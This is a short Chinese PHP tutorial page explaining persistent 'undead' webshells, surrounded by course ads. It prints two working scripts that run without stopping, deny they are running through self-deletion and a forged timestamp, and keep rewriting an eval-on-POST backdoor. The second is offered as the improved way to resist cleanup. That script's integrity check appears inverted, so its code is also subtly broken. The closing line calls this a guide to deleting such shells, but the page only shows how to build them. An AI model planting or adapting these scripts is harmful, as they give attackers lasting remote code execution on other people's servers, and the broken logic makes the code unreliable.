php入门到就业线上直播课:进入学习
什么是不死马?
内存马,通俗讲就是不死马,就是会运行一段永远不退出的程序常驻在PHP进程里,无限执行。
生成过程 (推荐学习:PHP视频教程)
不死马.php → 上传到server → server执行文件 → server本地无限循环生成 (一句话.php)
网上流传的不死马
<?php ignore_user_abort(true);
set_time_limit(0);
unlink(__FILE__);
$file = '2.php';
$code = '<?php if(md5($_GET["pass"])=="1a1dc91c907325c69271ddf0c944bc72"){@eval($_POST[a]);} ?>';while (1){
file_put_contents($file,$code);
system('touch -m -d "2018-12-01 09:10:12" .2.php');
usleep(5000);
}
?>网上流传的不死马,while里面只是并没有判断了这个文件是不是存在,那么我只需要把这个文件中的shell注释掉就可以绕过你的内存木马了。
正确的姿势应该是这样 :
Copy<?php
ignore_user_abort(true);
set_time_limit(0);
$file = 'c.php';
$code = base64_decode('PD9waHAgZXZhbCgkX1BPU1RbY10pOz8+'); while(true) { if(md5(file_get_contents($file))===md5($code)) {
file_put_contents($file, $code);
}
usleep(50);
}?>以上就是php不死马如何删除的详细内容,更多请关注php中文网其它相关文章!
声明:本文内容由网友自发贡献,版权归原作者所有,本站不承担相应法律责任。如您发现有涉嫌抄袭侵权的内容,请联系admin@php.cn核实处理。
前端(VUE)零基础到就业课程:点击学习
自己动手写 PHP MVC 框架:点击学习
